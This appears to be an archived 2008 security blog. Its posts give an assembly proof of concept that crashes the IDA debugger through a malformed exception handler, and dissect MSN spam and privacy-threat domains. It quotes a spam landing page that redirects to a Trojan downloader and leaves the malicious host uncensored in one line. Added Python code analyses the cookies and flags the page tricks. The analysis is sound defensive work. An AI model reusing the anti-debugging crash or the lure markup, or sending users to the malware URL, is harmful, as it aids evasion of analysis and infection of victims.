IDA Debugger Malformed SEH Causes Crash

August 31, 2008

Hi,

Malformed SEH Code causes IDA Debugger (idag.exe) crash.

This is the crashing code sample

;####  IDA Debugger Crash ####
;
; Author: Giuseppe 'Evilcry' Bonfa'
; http://evilcry.altervista.org
; E-Mail: evilcodecave (AT) gmail (DOT) com
;
;  A malformed exception handler causes an IDA Debugger core dump
;
;##################
.586
.model flat, stdcall
option casemap: none
;###################
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib

.data
titolo db "Titolo",0
testo db "Exception!",0
.code
START:
assume fs:nothing
push offset exceptHandler    ; build an EXCEPTION_REGISTRATION record on the stack:
push fs:[0]                  ;   Next = current head of the SEH chain
mov fs:[0], esp              ;   and install it as the new head
xor eax,eax
mov eax,[eax]    ;## Generate Exception ## (read from address 0)
pop fs:[0]                   ; unlink the handler (never reached, see the handler below)
add esp,4
jmp exit
exceptHandler:
pusha
invoke MessageBox,NULL, ADDR testo, ADDR titolo, MB_OK
popa
xor eax,eax                  ; return 0 = ExceptionContinueExecution without touching the
ret                          ; context: the faulting mov is re-executed and faults again
exit:
invoke ExitProcess, 0
end START

As you can see, this is just an SEH handler that is invoked in an infinite loop: it returns 0 (continue execution) without fixing the fault, so the faulting instruction is re-executed and raises the same exception again. If this sample is debugged with the IDA Debugger, it produces a dump that blocks IDA.

From the dump analysis we can see that the problem is caused by KiFastSystemCallRet:

0:000> !analyze -v

FAULTING_IP:
+0
00000000 ??              ???
EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00000000
ExceptionCode: 80000003 (Break instruction exception)
ExceptionFlags: 00000000
NumberParameters: 0
FAULTING_THREAD:  000003dc
DEFAULT_BUCKET_ID:  FILL_PATTERN_ffffffff
PROCESS_NAME:  idag.exe
ERROR_CODE: (NTSTATUS) 0x80000003 - {ERRORE DI EXCEPTION}  Breakpoint  È stato raggiunto un breakpoint.
APPLICATION_VERIFIER_FLAGS:  0
PRIMARY_PROBLEM_CLASS:  FILL_PATTERN_ffffffff
BUGCHECK_STR:  APPLICATION_FAULT_FILL_PATTERN_ffffffff
LAST_CONTROL_TRANSFER:  from 7c91e027 to 7c91eb94
STACK_TEXT:
0012a250 7c91e027 7c80aaed ffffffff 0000000c ntdll!KiFastSystemCallRet
0012a254 7c80aaed ffffffff 0000000c 7c91e639 ntdll!NtQueryInformationProcess+0xc
0012a284 7c8132b1 7c8132c4 000001e4 00000364 kernel32!GetErrorMode+0x18
0012a548 00000000 0012a6f0 03de0cd3 03de0ce8 kernel32!GetLongPathNameW+0x3ab
STACK_COMMAND:  ~0s; .ecxr ; kb
FOLLOWUP_IP:
ntdll!KiFastSystemCallRet+0
7c91eb94 c3              ret
SYMBOL_STACK_INDEX:  0
SYMBOL_NAME:  ntdll!KiFastSystemCallRet+0
FOLLOWUP_NAME:  MachineOwner
MODULE_NAME: ntdll
IMAGE_NAME:  ntdll.dll
DEBUG_FLR_IMAGE_TIMESTAMP:  41252c01
FAILURE_BUCKET_ID:  FILL_PATTERN_ffffffff_80000003_ntdll.dll!KiFastSystemCallRet
BUCKET_ID:  APPLICATION_FAULT_FILL_PATTERN_ffffffff_ntdll!KiFastSystemCallRet+0

And this is the stack backtrace:

0:000> ~*k

.  0  Id: 364.3dc Suspend: 0 Teb: 7ffde000 Unfrozen
ChildEBP RetAddr
0012a250 7c91e027 ntdll!KiFastSystemCallRet
0012a254 7c80aaed ntdll!NtQueryInformationProcess+0xc
0012a284 7c8132b1 kernel32!GetErrorMode+0x18
0012a548 00000000 kernel32!GetLongPathNameW+0x3ab

1  Id: 364.574 Suspend: 0 Teb: 7ffdd000 Unfrozen
ChildEBP RetAddr
0157fd54 7c91e9c0 ntdll!KiFastSystemCallRet
0157fd58 719d4033 ntdll!ZwWaitForSingleObject+0xc
0157fd94 719e104f mswsock!SockWaitForSingleObject+0x1a0
0157fe14 71a3f6cf mswsock!WSPRecvFrom+0x1f0
0157fe58 71a5303e ws2_32!WSARecvFrom+0x7d
0157fe8c 004fc31b wsock32!recvfrom+0x39
WARNING: Stack unwind information not available. Following frames may be wrong.
00000000 00000000 idag!Debugger_breakpointFinalize+0x1ce7


The MSN Dark Chain of Spam – yopicz.com and others

August 26, 2008

Hi,

As you have seen from my previous posts, MSN privacy-threat domains have increased significantly in this period. You can also see how similar the methods and structures used by these domains are.

The same Hong Kong hosting run with the same HTTP daemon, the same way of releasing tracking cookies and, finally, different advertised end-point domains.

So my question was: “Is it possible to reveal a chain of spam information exchanged between these sites?”

The answer came by itself yesterday: some time ago I created a fake MSN account and joined one of these “services”, namely yopicz.com.

yopicz.com is one of the classic domains spread through MSN, but with some basic differences from the others.

Let’s see the code:

<html>
<head>
<title></title>
</head>
<frameset cols="0,*" frameborder=0>
<frame src="pop.php" name="">
<frame src="indexx.php" name="mainwindow">
</frameset>
</html>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "UA-3898830-2";
urchinTracker();
</script>

-> pop.php

<script>
var UserClicked=false;
document.onkeydown=spyclick;
document.onmousedown=spyclick;
function spyclick()
{
UserClicked=true;
setTimeout("UserClicked=false",2000);   // forget the click/keypress after 2 seconds
}
function popup()
{
if(!UserClicked)   // open the window only if the user did not just click or type
{
var win=window.open("http://awesomeoffers.info","","width=1024,height=768")
}
}
window.onbeforeunload=popup;   // fired when the user leaves the page
</script>

In other words, you are redirected to awesomeoffers.info, which is the advertised website.

-> indexx.php

It contains a fake privacy policy:

“By filling out this form, you authorize TST Management, Inc to spread the word about this 100% real and upcoming Messenger Community Site. You will receive your share of the credit in helping us spread the word. This is a harmless Community site which is offering users a platform to meet each other for free.

We do not share your private information with any third parties.

This page is not affiliated with or operated by Microsoft(tm) or MSN Network(tm).

TST Management, Inc reserves the right to change the terms of use / privacy policy at any time without notice. To view the latest version of this privacy policy, simply bookmark this page for future reference.

You understand that this agreement shall prevail if there is any conflict between this agreement and the terms of use you accepted when you signed up with MSN. You also understand that by temporarily accessing your msn account, TST Management, Inc is NOT agreeing to MSN’s terms of use and therefore not bound by them.”

Eheheheheeh, strange this TST Management!! It has a “legal” privacy policy that is not conventionally written, a “legal policy” that breaks Microsoft’s and MSN’s terms? Wooow, we are in front of a new frontier of legality!! Sign a legal policy to legally break third parties’ rules! :)

After subscribing to yopicz.com, my honeypot account started receiving various advertising messages from

  • awesomezz.com
  • PassionZz.com
  • RealDealzz.com
  • insaneimagz.com

So this IS a CHAIN of spam websites that exchange/send your credentials among the various domains!

If you receive more of these messages, report them to me and I’ll dissect them :)

May the God of Paranoia be with you :)


MSN Privacy Threat – passionzz.com

August 25, 2008

Hi,

Here is another privacy threat similar to the previous one already seen: the malicious domain is spread by offline MSN contacts in the form of

http://_mail_address.passionzz.com

Here is the classic HTML source already seen:

<html>
<head>
<title></title>
</head>
<frameset rows="*,30,1" frameborder=0>
<frame src="indexx.php" name="">
<frame src="abuse.html" name= frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame>
<frame src="body.php" name= frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame>
</frameset>
</html>

-> abuse.html

<center><b>Send Abuses to <a href="mailto:abuse@cpashield.com">abuse@cpashield.com</a></b>

-> body.php

<img src="http://www.ipcounter.de/count.php?u=53083499&amp;color=pink" alt="" border="0" width=0 height=0></a></noscript>
<img src="http://www.ipcounter.de/count.php?u=54136814&amp;color=pink" alt="" border="0" width=0 height=0></a></noscript>

-> indexx.php

Redirection to http://www.incentaclick.com/nclick.php?id=16550&cid=3915&sub=newadx_passion

<html><head><title>Incentaclick Media</title><meta http-equiv='refresh' content="0;url=http://banners.passion.com/go/page/25647_landing_passion_01b?pid=p497792.sub16550-newadx_passion&ip=auto"></head><body></body></html>

Tracking Cookie Installation

Set-Cookie: IncentaclickUC391516550=391516550newadx_passion; expires=Wed, 24-Sep-2008 17:08:59 GMT; path=/; domain=.incentaclick.com
Set-Cookie: IncentaclickUC391516550=391516550newadx_passion; expires=Wed, 24-Sep-2008 17:08:59 GMT; path=/; domain=www.incentaclick.com
Set-Cookie: IncentaclickTrackCookie3915=16550-newadx_passion; expires=Sun, 23-Nov-2008 17:08:59 GMT; path=/; domain=.incentaclick.com
Set-Cookie: IncentaclickTrackCookie3915=16550-newadx_passion; expires=Sun, 23-Nov-2008 17:08:59 GMT; path=/; domain=www.incentaclick.com

After Incentaclick has transparently installed its tracking cookies, you are redirected to

http://banners.passion.com/go/page/25647_landing_passion_01b?pid=p497792.sub16550-newadx_passion&ip=auto

Registry Data

ICANN Registrar: ENOM, INC.
Created: 2008-08-24
Expires: 2009-08-24
Updated: 2008-08-24
Registrar Status: clientTransferProhibited
Name Server: DNS1.REGISTRAR-SERVERS.COM (has 99,883 domains)
Name Server: DNS2.REGISTRAR-SERVERS.COM
Name Server: DNS3.REGISTRAR-SERVERS.COM
Whois Server: whois.enom.com


Server Data

IP Address: 127.0.0.1
IP Location – Loopback
Response Code: 200
Domain Status: Registered And Active Website

Remove Instructions

Remove the cookies and change your MSN password!!!!

See you at the next post… :)


Another MSN Privacy / Spam Threat awesomezz.com

August 21, 2008

Hi,

Thanks to a report from Roberta, I have identified another spam/privacy threat spreading through MSN.

The structure is identical to ultimatestufff, but the end-point domain changes.

Online contacts receive an offline message composed like this: http://_mail_address.awesomezz.com

Let’s dissect it!

From the HTTP headers we can see that this domain is run by a small web server:

HTTP/1.0 200 OK
Connection: close
X-Powered-By: PHP/4.4.8
Content-type: text/html
Content-Length: 242
Date: Thu, 21 Aug 2008 15:00:41 GMT
Server: lighttpd/1.4.19

And this is the HTML code:

<html>
<head>
<title></title>
</head>
<frameset rows="*,30,1" frameborder=0>
<frame src="indexx.php" name="">
<frame src="abuse.html" name= frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame>
<frame src="counter.php" name= frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame>
</frameset>
</html>

-> counter.php

<img src="http://www.ipcounter.de/count.php?u=52572355&amp;color=pink" alt="" border="0" width=0 height=0></a></noscript>
<img src="http://www.ipcounter.de/count.php?u=54136814&amp;color=pink" alt="" border="0" width=0 height=0></a></noscript>

-> abuse.html

<center><b>Send Abuses to <a href="mailto:abuse@cpashield.com">abuse@cpashield.com</a></b>

-> indexx.php

The approach is always the same: the user lands on a certain website by passing through another website that installs some tracking cookies. Indeed, as we can see, indexx.php points to Incentaclick

http://www.incentaclick.com/nclick.php?id=17133&cid=4804&sub=newadx_ita

which transparently (a common user will not notice that hop) installs some cookies:

Set-Cookie: IncentaclickUC480417133=480417133newadx_ita; expires=Sat, 20-Sep-2008 07:00:43 GMT; path=/; domain=.incentaclick.com
Set-Cookie: IncentaclickUC480417133=480417133newadx_ita; expires=Sat, 20-Sep-2008 07:00:43 GMT; path=/; domain=www.incentaclick.com
Set-Cookie: IncentaclickTrackCookie4804=17133-newadx_ita; expires=Wed, 19-Nov-2008 07:00:43 GMT; path=/; domain=.incentaclick.com
Set-Cookie: IncentaclickTrackCookie4804=17133-newadx_ita; expires=Wed, 19-Nov-2008 07:00:43 GMT; path=/; domain=www.incentaclick.com

The redirection points to

http://www.flycell.it/offer/?ref=2650&transid=17133-newadx_ita

The pattern is exactly the same as Ultimatestufff.com, with the difference that the end point seems to be a website for mobile phones, but probably the user is asked to give MSN credentials.

Here is the domain analysis:

Registry Data

ICANN Registrar: ENOM, INC.
Created: 2008-08-20
Expires: 2009-08-20
Updated: 2008-08-20
Registrar Status: clientTransferProhibited
Name Server: DNS1.REGISTRAR-SERVERS.COM (has 96,391 domains)
Name Server: DNS2.REGISTRAR-SERVERS.COM
Name Server: DNS3.REGISTRAR-SERVERS.COM
Whois Server: whois.enom.com


Server Data

IP Address: 210.56.53.73
IP Location Hong Kong – Hong Kong (sar) – Hong Kong – Sun Network (hong Kong) Limited
Response Code: 200
Domain Status: Registered And Active Website

See you at the next post


New MSN Privacy Threat – ultimatestufff.com

August 17, 2008

Hi,

Today I was informed of a new privacy threat spread through MSN.

Offline contacts send the following link to all online contacts: http://ultimatestufff.com/

Let’s see how ultimatestufff works…

At a first dissection we can see that this web service is surely run from a small private server;

HTTP/1.0 200 OK
Connection: close
X-Powered-By: PHP/4.4.8
Content-type: text/html
Content-Length: 345
Date: Sun, 17 Aug 2008 13:04:33 GMT
Server: lighttpd/1.4.19

this is because lighttpd is used (see the Server header).

The content of the first page is similar to my previous MSN malicious website discovery; indeed we have:

<html>
<head>
<title></title>
</head>
<frameset rows="*,30,1" frameborder=0>

<frame src="indexx.php" name="">
<frame src="abuse.html" name= frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame>
<frame src="counter.php" name= frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame>

</frameset>
</html>

-> abuse.html

<center><b>Send Abuses to <a href="mailto:abuse@cpashield.com">abuse@cpashield.com</a></b>

It looks exactly like the previous case, but without the Java obfuscation.

-> counter.php

<img src="http://www.ipcounter.de/count.php?u=52572355&amp;color=pink" alt="" border="0" width=0 height=0></a></noscript>
<img src="http://www.ipcounter.de/count.php?u=54136814&amp;color=pink" alt="" border="0" width=0 height=0></a></noscript>

And finally the most interesting part, indexx.php, which performs a redirection to:

http://www.incentaclick.com/nclick.php?id=14955&cid=3674&sub=newadx

This time the web service involved is more significant: a well-known service, Incentaclick, is used, and it installs some tracking cookies:

HTTP/1.1 200 OK
Date: Sun, 17 Aug 2008 05:06:08 GMT
Server: Apache
Set-Cookie: IncentaclickUC367414955=367414955newadx; expires=Tue, 16-Sep-2008 05:06:08 GMT; path=/; domain=.incentaclick.com
Set-Cookie: IncentaclickUC367414955=367414955newadx; expires=Tue, 16-Sep-2008 05:06:08 GMT; path=/; domain=www.incentaclick.com
Set-Cookie: IncentaclickTrackCookie3674=14955-newadx; expires=Sat, 15-Nov-2008 05:06:08 GMT; path=/; domain=.incentaclick.com
Set-Cookie: IncentaclickTrackCookie3674=14955-newadx; expires=Sat, 15-Nov-2008 05:06:08 GMT; path=/; domain=www.incentaclick.com
P3P: CP="NOI DSP COR NID"
Content-Length: 184
Connection: close
Content-Type: text/html; charset=UTF-8

And this is the source code:

<html><head><title>Incentaclick Media</title><meta http-equiv='refresh' content="0;url=http://www.perfspot.com/join.asp?LanguageID=1&p=98958&t=14955-newadx"></head><body></body></html>

As you can see, there is a meta refresh that redirects (instantly!) the user to another website:

http://www.perfspot.com/join.asp?languageid=1&p=98958&t=14955-newadx

A common visitor will not notice the passage through Incentaclick, but will have its cookies…
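The Incentaclick hop here, and the identical ones in the passionzz.com and awesomezz.com posts above, all set the same two kinds of cookie. The following is an added example, not the blog's code nor anything from Incentaclick: it parses the response headers quoted above, measures how long each cookie lives, checks whether it is third-party relative to the host the victim was actually sent to (ultimatestufff.com), and shows which nclick.php query parameters (id, cid, sub) are encoded in each cookie's name and value. Only the standard library is used.

```python
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Captured response from the post (the Incentaclick hop of the ultimatestufff chain).
RESPONSE_HEADERS = """\
HTTP/1.1 200 OK
Date: Sun, 17 Aug 2008 05:06:08 GMT
Server: Apache
Set-Cookie: IncentaclickUC367414955=367414955newadx; expires=Tue, 16-Sep-2008 05:06:08 GMT; path=/; domain=.incentaclick.com
Set-Cookie: IncentaclickUC367414955=367414955newadx; expires=Tue, 16-Sep-2008 05:06:08 GMT; path=/; domain=www.incentaclick.com
Set-Cookie: IncentaclickTrackCookie3674=14955-newadx; expires=Sat, 15-Nov-2008 05:06:08 GMT; path=/; domain=.incentaclick.com
Set-Cookie: IncentaclickTrackCookie3674=14955-newadx; expires=Sat, 15-Nov-2008 05:06:08 GMT; path=/; domain=www.incentaclick.com
P3P: CP="NOI DSP COR NID"
Content-Length: 184
"""
# The URL indexx.php redirected to, and the host the victim believed they were visiting.
NCLICK_URL = "http://www.incentaclick.com/nclick.php?id=14955&cid=3674&sub=newadx"
VISITED_HOST = "ultimatestufff.com"

# Netscape-style cookie dates use hyphens; the HTTP Date header uses spaces.
DATE_FORMATS = ("%a, %d-%b-%Y %H:%M:%S GMT", "%a, %d %b %Y %H:%M:%S GMT")


def parse_http_date(text):
    for fmt in DATE_FORMATS:
        try:
            return datetime.strptime(text.strip(), fmt)
        except ValueError:
            continue
    raise ValueError("unrecognised date: %r" % text)


def split_headers(raw):
    """Return (status_line, [(name, value), ...]) keeping duplicate headers."""
    lines = raw.strip().splitlines()
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers


def parse_set_cookie(header_value):
    """Split one Set-Cookie value into (name, value, {attribute: value})."""
    first, *rest = [p.strip() for p in header_value.split(";")]
    name, _, cookie_value = first.partition("=")
    attrs = {}
    for part in rest:
        key, _, val = part.partition("=")
        attrs[key.lower()] = val
    return name, cookie_value, attrs


def is_third_party(cookie_domain, visited_host):
    """True unless the cookie's Domain covers the host the user meant to visit."""
    domain = cookie_domain.lstrip(".").lower()
    host = visited_host.lower()
    return not (host == domain or host.endswith("." + domain))


def locate_params(name, value, params):
    """For each query parameter, report whether its value appears in the cookie
    value, the cookie name, or nowhere: this is what ties the cookie to the campaign."""
    where = {}
    for key, val in params.items():
        if val in value:
            where[key] = "value"
        elif val in name:
            where[key] = "name"
        else:
            where[key] = None
    return where


def analyse(raw_response=RESPONSE_HEADERS, visited_host=VISITED_HOST, nclick_url=NCLICK_URL):
    """One report entry per Set-Cookie header in the response."""
    _, headers = split_headers(raw_response)
    served_at = parse_http_date(dict(headers)["Date"])
    params = {k: v[0] for k, v in parse_qs(urlsplit(nclick_url).query).items()}
    report = []
    for hname, hvalue in headers:
        if hname.lower() != "set-cookie":
            continue
        name, value, attrs = parse_set_cookie(hvalue)
        domain = attrs.get("domain", visited_host)
        report.append({
            "name": name,
            "domain": domain,
            "third_party": is_third_party(domain, visited_host),
            "lifetime_days": (parse_http_date(attrs["expires"]) - served_at).days,
            "params": locate_params(name, value, params),
        })
    return report


if __name__ == "__main__":
    for entry in analyse():
        print(entry)
```

Running it shows that every cookie is scoped to incentaclick.com rather than to the site the message advertised, that the UC cookie lives 30 days and the TrackCookie 90 days, and that the affiliate id, campaign id and sub-id from the query string are all recoverable from the cookie alone: whoever reads the cookie later can attribute the visit back to the MSN spam wave that produced it.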

Perfspot is a website that offers a meeting service.

It’s interesting to see that during registration the user is asked to provide MSN/LinkedIn/Live account credentials, and this is the point where the unwary user allows Perfspot to reach other users.

Another interesting point is that, after you have completed the registration, you are automatically presented with a geo-location that corresponds to the location of the offline user who sent you the message.

Here is the domain information for ultimatestufff.com

Domain Information

ICANN Registrar: ENOM, INC.
Created: 2008-08-15
Expires: 2009-08-15
Updated: 2008-08-15
Registrar Status: clientTransferProhibited
Name Server: DNS1.REGISTRAR-SERVERS.COM (has 94,989 domains)
Name Server: DNS2.REGISTRAR-SERVERS.COM
Name Server: DNS3.REGISTRAR-SERVERS.COM
Whois Server: whois.enom.com


Server Data

IP Address: 210.56.53.73
IP Location Hong Kong – Hong Kong (sar) – Hong Kong – Sun Network (hong Kong) Limited
Response Code: 200
Domain Status: Registered And Active Website

What can I say… I’m a proud paranoid!!! :)

See you at the next post…

PS: I’m open to job offerings! :)


Malicious Spam in Action

August 11, 2008

Hi,

Usually spam is aimed at mass marketing and does not contain any form of malicious code, but recently a second, collateral and rapidly emerging trend (especially in web applications that allow comments, such as blogs) is malicious spam: an apparently ordinary spam mail that redirects you to malicious code…

Here is the latest malicious spam mail that I received on my Gmail account:

Subject: mp3 Shocking for evilcry

Content: Rihanna New video!!!
Look It now

The malicious link points to http://ro{CENSORED}eel.com/index1.php

By dissecting the malicious link we can see that a redirection is performed:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<META HTTP-EQUIV="refresh" CONTENT="5;URL=http://robbiereel.com/video3425gdf3.exe">
<title></title>
</head>

<body style="background:#ffffff;">
<iframe src="http://ro{CENSORED}l.com/pindex.php" style="width:1px; height:1px;"></iframe><br>

<div style="text-align:center; padding-top:50px;">
<a href="http://ro{CENSORED}l.com/video3425gdf3.exe" style="font-weight:bold;"><img src="wait.gif" style="border:0px;"></a><br>
<br>
<a href="http://r{CENSORED}l.com/video3425gdf3.exe" style="font-weight:bold; color:#364980; font-size:17px;">Download Video</a>

</div>
</body>
</html>

The technique is always the same: a fake video .exe that the victim downloads and executes; in this case the malware is named video3425gdf3.exe.
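The client-side tricks seen across these posts (the zero-size ipcounter.de images in counter.php/body.php, the onbeforeunload pop-up in yopicz.com's pop.php, the Incentaclick meta refresh, and here a meta refresh plus a 1x1 iframe and download links pointing at an .exe) can all be picked up by a static pass over the captured HTML, before anything is executed. The following is an added example, not the blog's code nor anything from the sites it describes: a small triage based on the standard-library HTML parser, run over sample pages reconstructed from the snippets quoted in the posts. The spam landing page uses the placeholder host spam-sender.example in place of the censored domain.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

EXECUTABLE_SUFFIXES = (".exe", ".scr", ".pif", ".bat")
# Higher number = worse; 'redirect' is a cross-host meta refresh to a non-executable target.
SEVERITY = {"clean": 0, "redirect": 1, "tracking_pixel": 2, "hidden_iframe": 3,
            "exit_popup": 3, "executable_link": 4, "refresh_to_executable": 4}

REFRESH_RE = re.compile(r"^\s*\d+\s*;\s*url\s*=\s*['\"]?([^'\"\s]+)", re.IGNORECASE)
PX_RE = re.compile(r"(width|height)\s*:\s*(\d+)\s*px", re.IGNORECASE)
OPEN_RE = re.compile(r"window\.open\s*\(\s*['\"]([^'\"]+)")


def _tiny(attrs):
    """True when width and height are both given (attribute or inline px) and both <= 1."""
    dims = {}
    for key in ("width", "height"):
        if attrs.get(key, "").strip().isdigit():
            dims[key] = int(attrs[key])
    for key, val in PX_RE.findall(attrs.get("style", "")):
        dims[key.lower()] = int(val)
    return len(dims) == 2 and max(dims.values()) <= 1


def _points_to_executable(url):
    return urlsplit(url).path.lower().endswith(EXECUTABLE_SUFFIXES)


class PageTriage(HTMLParser):
    """Collect (finding, detail) pairs while parsing one page served by page_host."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []
        self._script = None  # text chunks while inside <script>, else None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "img" and _tiny(a):
            self.findings.append(("tracking_pixel", a.get("src", "")))
        elif tag == "iframe" and _tiny(a):
            self.findings.append(("hidden_iframe", a.get("src", "")))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = REFRESH_RE.match(a.get("content", ""))
            if m:
                self._classify_redirect(m.group(1))
        elif tag == "a" and _points_to_executable(a.get("href", "")):
            self.findings.append(("executable_link", a["href"]))
        elif tag == "script":
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            body, self._script = "".join(self._script), None
            # pop.php pattern: window.open() wired to onbeforeunload, fired unless the user just clicked.
            m = OPEN_RE.search(body)
            if m and re.search(r"onbeforeunload\s*=", body):
                self.findings.append(("exit_popup", m.group(1)))

    def _classify_redirect(self, url):
        if _points_to_executable(url):
            self.findings.append(("refresh_to_executable", url))
        elif (urlsplit(url).hostname or self.page_host).lower() != self.page_host:
            self.findings.append(("redirect", url))


def triage(html, page_host):
    """Return the list of (finding, detail) for one captured page."""
    parser = PageTriage(page_host)
    parser.feed(html)
    parser.close()
    return parser.findings


def verdict(findings):
    """Name of the most severe finding, or 'clean'."""
    return max((f for f, _ in findings), key=SEVERITY.get, default="clean")


# Sample pages reconstructed from the posts (constructed test inputs; placeholder host for the spam page).
COUNTER_PHP = ('<img src="http://www.ipcounter.de/count.php?u=52572355&amp;color=pink" alt="" border="0" '
               'width=0 height=0></a></noscript><img src="http://www.ipcounter.de/count.php?u=54136814'
               '&amp;color=pink" alt="" border="0" width=0 height=0></a></noscript>')
POP_PHP = """<script>
var UserClicked=false;
document.onkeydown=spyclick; document.onmousedown=spyclick;
function spyclick(){UserClicked=true;setTimeout("UserClicked=false",2000);}
function popup(){if(!UserClicked){var win=window.open("http://awesomeoffers.info","","width=1024,height=768")}}
window.onbeforeunload=popup;
</script>"""
INCENTACLICK = ('<html><head><title>Incentaclick Media</title><meta http-equiv=\'refresh\' '
                'content="0;url=http://www.perfspot.com/join.asp?LanguageID=1&p=98958&t=14955-newadx">'
                '</head><body></body></html>')
SPAM_LANDING = """<html><head>
<META HTTP-EQUIV="refresh" CONTENT="5;URL=http://spam-sender.example/video3425gdf3.exe">
</head><body>
<iframe src="http://spam-sender.example/pindex.php" style="width:1px; height:1px;"></iframe>
<a href="http://spam-sender.example/video3425gdf3.exe"><img src="wait.gif"></a>
<a href="http://spam-sender.example/video3425gdf3.exe">Download Video</a>
</body></html>"""
```

Calling `triage(SPAM_LANDING, "spam-sender.example")` yields a refresh_to_executable, a hidden_iframe and two executable_link findings, so `verdict()` returns refresh_to_executable; the Incentaclick page comes back as a plain cross-host redirect, counter.php as two tracking pixels, and pop.php as an exit_popup pointing at awesomeoffers.info. The dimension check deliberately requires both width and height, since a missing attribute means a normally rendered element, not a hidden one.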

Let’s analyse video3425gdf3.exe:

File: video3425gdf3.exe

MD5: acd73c4930e8191fa7a35dac448d7f4b

Kaspersky Anti-Virus: Found Trojan-Downloader.Win32.Agent.aacg

